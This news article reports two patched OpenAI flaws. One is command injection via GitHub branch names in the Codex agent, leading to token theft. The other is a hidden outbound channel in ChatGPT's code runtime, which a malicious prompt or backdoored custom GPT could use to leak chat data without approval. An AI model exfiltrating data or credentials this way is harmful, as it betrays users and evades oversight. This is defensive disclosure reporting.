OpenAI has fixed two flaws in its AI stack that could allow AI agents to move sensitive data in unintended ways.
The issues, disclosed by researchers at BeyondTrust and Check Point Research, affect the OpenAI Codex coding agent and ChatGPT’s code execution environment, respectively. One enabled GitHub token theft through command injection, while the other exposed a hidden channel for silently leaking user data.
Both bugs have now been patched, but researchers warn that giving AI tools autonomy to execute code and interact with external systems creates a long-term risk, allowing attackers to carry out malicious actions without ever breaking the model itself.
Codex command injection turns branch names into backdoors
Researchers at BeyondTrust found that Codex, OpenAI’s coding agent that executes tasks in cloud containers, was vulnerable to a command injection bug concerning the GitHub branch name parameter.
When Codex attempts a task, it clones a repository and authenticates using a short-lived GitHub token. The issue stemmed from how it handled user-controlled input during this setup phase. Specifically, the branch name parameter was not properly sanitized, allowing attackers to inject arbitrary shell commands into the environments.
A maliciously crafted branch name could execute code inside the container, exposing the very token Codex used to access the repository. Researchers demonstrated that the token could then be exfiltrated via task output or external network requests.
This effectively turns a routine developer workflow into a potential credential theft vector. GitHub tokens often grant broad access to private repositories, making them highly valuable in supply chain attacks.
According to a BeyondTrust blog post, the issue was disclosed to OpenAI, which acted quickly to address it by tightening input validation around the vulnerable parameter and hardening how commands are constructed in the execution environment. The fix was rolled out before public disclosure, with no evidence of active exploitation reported, the post added.
Input validation failures seem to have gone up with AI workflows, leading to classic command injection vulnerabilities.
ChatGPT’s hidden outbound channel leaks user data
OpenAI has reportedly fixed a parallel bug in ChatGPT that goes beyond credential theft. Check Point researchers uncovered a hidden outbound communication path in ChatGPT’s code execution runtime that could be triggered with a single malicious prompt.
This channel successfully bypassed the platform’s expected safeguards around external data sharing. Instead of requiring explicit user approval, the runtime could transmit data, such as chat messages, uploaded files, or generated outputs, to an external server without any visible alerts.
CheckPoint researchers demonstrated crafting a prompt that leverages this behavior, allowing the runtime to package and transmit private chat data to an external server. Basically, a normal-looking conversation could be turned into a covert data exfiltration pipeline.
The same mechanism could also be abused by a backdoored or malicious custom GPT, allowing it to siphon off sensitive information without user awareness, the researchers said, adding that the channel could potentially be used to establish remote shell access within the execution environment.
While no active exploitation has been reported, the researchers note significant implications. OpenAI fixed the issue around the same time as the Codex flaw patching by tightening controls around outbound communication in the code execution environment.
OpenAI did not immediately respond to CSO’s request for comments on either of the flaws.
No Responses